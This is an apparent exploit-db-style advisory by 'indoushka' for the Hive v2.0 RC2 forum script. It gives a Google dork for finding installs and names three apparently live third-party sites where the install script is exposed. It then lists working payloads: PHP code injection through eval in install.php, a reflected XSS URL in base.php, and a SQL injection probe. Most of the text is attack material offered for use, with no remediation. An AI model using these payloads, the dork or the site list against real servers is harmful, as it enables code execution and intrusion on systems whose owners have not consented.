| # Title    : Hive v2.0 RC2 Multi Vulnerability   
| # Author   : indoushka                                                               
| # email    : indoushka4ever@gmail.com                                                                                                                                                                 
| # Dork     : "Powered by DigitalHive"                                                                                                 
| # Tested on: windows 8.1 Français V.(Pro)        
| # Bug      : Stop Script
| # Download : http:///www.digitalhive.com                                                  
=======================================
Stop SCript working :

monocircus.free.fr/Forum/install/install.php?var=finish
sgdf.rodez.free.fr/forum/index.php
espace-associatif.org/forum/install/install.php

PHP code injection :

Vulnerability description
This script is vulnerable to PHP code injection.

PHP code injection is a vulnerability that allows an attacker to inject custom code into the server side scripting engine. This vulnerability occurs when an attacker can control all or part of an input string that is fed into an eval() function call. Eval will execute the argument as code.
This vulnerability affects /hive/install/install.php. 

Attack details
URL encoded POST input base was set to ${@print(md5(test))}
Possible execution result: 63c19a6da79816b21429e5bb262daed8

Xss :

http://localhost//hive/base.php?mt=1%22%20onmouseover%3dprompt%28933088%29%20bad%3d%22&page=membres.php

SQL injection :

This vulnerability affects /hive/base.php. 
Attack details
URL encoded POST input location was set to 1'"
Error message found: 
supplied argument is not a valid MySQL result

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------